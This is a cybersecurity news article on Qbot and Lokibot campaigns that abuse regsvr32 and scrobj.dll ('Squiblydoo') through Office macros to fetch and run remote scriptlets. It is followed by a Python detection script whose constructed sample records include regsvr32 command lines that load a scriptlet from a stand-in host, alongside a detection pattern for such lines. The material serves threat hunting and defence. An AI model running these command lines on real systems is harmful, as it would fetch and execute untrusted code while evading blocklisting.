Qbot And Lokibot Malware Now Use Windows Regsvr32 to Distribute Payloads

Malware distributors have revived an older technique known as Squiblydoo to deliver Qbot and Lokibot through Microsoft Office documents that invoke regsvr32.exe. According to a report from the threat research team at security analytics platform Uptycs, abuse of regsvr32.exe has increased over the past several months. It appears across numerous document formats, but mostly in Excel files.

The renewed interest in this command-line program is explained by the fact that it lets threat actors bypass application blocklisting that might otherwise halt the infection chain. According to telemetry gathered from Uptycs customers, most instances of this abuse of a built-in Windows tool were recorded in December 2021, and the rate remained high into 2022.

The regsvr32 command-line program in Windows is used to register and unregister OLE controls (DLLs and ActiveX controls) in the registry. Threat actors do not use it to make registry changes; instead they hand it scrobj.dll, the Windows script component runtime, so that it loads and runs a COM scriptlet from a remote location. Where a legitimate invocation passes an OCX or DLL (a special-purpose module that exposes ready-made components) to be registered, the malicious invocation passes scrobj.dll and supplies the scriptlet location through the /i: switch, so the tool fetches and executes script rather than registering a control.

This method is known as "Squiblydoo." It has been used in malware distribution since 2017, when ESET researchers first detected it in a campaign aimed at Brazilian targets. In the current campaign, threat actors use malicious macros in Excel, Word, RTF, and compound document files to launch regsvr32 as a child process of the Office application.

Most of these documents are delivered through phishing campaigns, but they can also be dropped through "blind" SEO poisoning. Because regsvr32 is a signed Windows program used in many routine operations, this approach effectively conceals the malware payload behind a trusted binary. As a result, security solutions are less likely to detect the threat and intervene to break the chain of infection.

Additionally, attackers can use remote COM scriptlets to load fileless malware, and because these payloads run in memory rather than from a file written to disk, detection is less likely. Uptycs has released a collection of indicators of compromise on its GitHub repository that can be used for focused threat hunting.
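The detection angle the article describes (regsvr32 spawned by an Office application, given scrobj.dll and a /i: argument pointing at a remote scriptlet) lends itself to a simple triage rule over process-creation telemetry. The following is an added example, not code from the article or from Uptycs: it scores constructed Sysmon-style records on those traits so that routine control registration is left alone while the Squiblydoo pattern surfaces. The record format, field names, hosts, paths and file names are all assumptions made for illustration.

```python
"""Triage process-creation events for the regsvr32 "Squiblydoo" pattern.

Added example, not code from the article or from Uptycs. Records use a
simplified 'Key=Value|Key=Value' text format constructed here (not real
Sysmon XML); paths, hosts and file names are likewise constructed.
"""
import re
from dataclasses import dataclass

# Office hosts whose macros would spawn regsvr32 in the campaign described.
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}

# /i: followed by an http(s) URL or a UNC path: the scriptlet is fetched remotely.
REMOTE_SCRIPTLET = re.compile(r'/i:"?(https?://|\\\\)', re.IGNORECASE)

# Number of matching traits mapped to a triage level.
LEVELS = {0: "benign", 1: "low", 2: "medium", 3: "high"}


@dataclass
class ProcessEvent:
    image: str
    command_line: str
    parent_image: str


def parse_event(line: str) -> ProcessEvent:
    """Parse one constructed 'Key=Value|Key=Value' record into a ProcessEvent."""
    fields = dict(part.split("=", 1) for part in line.split("|"))
    return ProcessEvent(fields["Image"], fields["CommandLine"], fields["ParentImage"])


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(ev: ProcessEvent):
    """Return (level, reasons) for one event; non-regsvr32 launches and
    ordinary control registration come back as ("benign", [])."""
    reasons = []
    if basename(ev.image) != "regsvr32.exe":
        return "benign", reasons
    cmd = ev.command_line.lower()
    # scrobj.dll plus /i: means regsvr32 calls DllInstall on the script
    # component runtime, which runs the scriptlet instead of registering a control.
    if "scrobj.dll" in cmd and "/i:" in cmd:
        reasons.append("scrobj.dll loaded with /i: (scriptlet execution)")
    if REMOTE_SCRIPTLET.search(ev.command_line):
        reasons.append("/i: target is remote (http(s) or UNC)")
    if basename(ev.parent_image) in OFFICE_PARENTS:
        reasons.append("spawned by Office application " + basename(ev.parent_image))
    return LEVELS[len(reasons)], reasons


def hunt(lines):
    """Classify each record; returns a list of (level, reasons) in input order."""
    return [classify(parse_event(line)) for line in lines]


# Constructed sample records (not real telemetry).
SAMPLE_EVENTS = [
    r"Image=C:\Windows\System32\regsvr32.exe|CommandLine=regsvr32 /s /n /u /i:https://cdn.example.invalid/a.sct scrobj.dll|ParentImage=C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
    r'Image=C:\Windows\SysWOW64\regsvr32.exe|CommandLine=regsvr32 /s "C:\Program Files\Vendor\ctl.ocx"|ParentImage=C:\Windows\System32\msiexec.exe',
    r"Image=C:\Windows\System32\regsvr32.exe|CommandLine=regsvr32 /s /n /u /i:\\fileserver\share\a.sct scrobj.dll|ParentImage=C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
    r"Image=C:\Windows\System32\regsvr32.exe|CommandLine=regsvr32 /s /n /u /i:C:\Users\Public\x.sct scrobj.dll|ParentImage=C:\Windows\System32\cmd.exe",
    r"Image=C:\Windows\System32\regsvr32.exe|CommandLine=regsvr32 /s C:\Users\u\AppData\Local\Temp\ctl.dll|ParentImage=C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
]

if __name__ == "__main__":
    for line, (level, reasons) in zip(SAMPLE_EVENTS, hunt(SAMPLE_EVENTS)):
        print(f"{level:7} {parse_event(line).command_line}")
        for reason in reasons:
            print(f"        - {reason}")
```

The scoring is deliberately additive rather than a single signature: a local scriptlet launched from cmd.exe and an Office process registering a plain DLL each score "low", which keeps them visible for review without drowning the "high" hits that combine scrobj.dll, a remote /i: target and an Office parent. In a real deployment the same three traits map directly onto Sysmon Event ID 1 fields (Image, CommandLine, ParentImage).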

About the author

CIM Team

CyberIntelMag is the trusted authority in cybersecurity, comprised of leading industry experts for over 20 years, dedicated to serving cybersecurity professionals. Our goal is to provide a one-stop shop for knowledge and insight needed to navigate throughout today’s emerging cybersecurity landscape through in-depth coverage of breaking news, tutorials, product reviews, videos and industry influencers.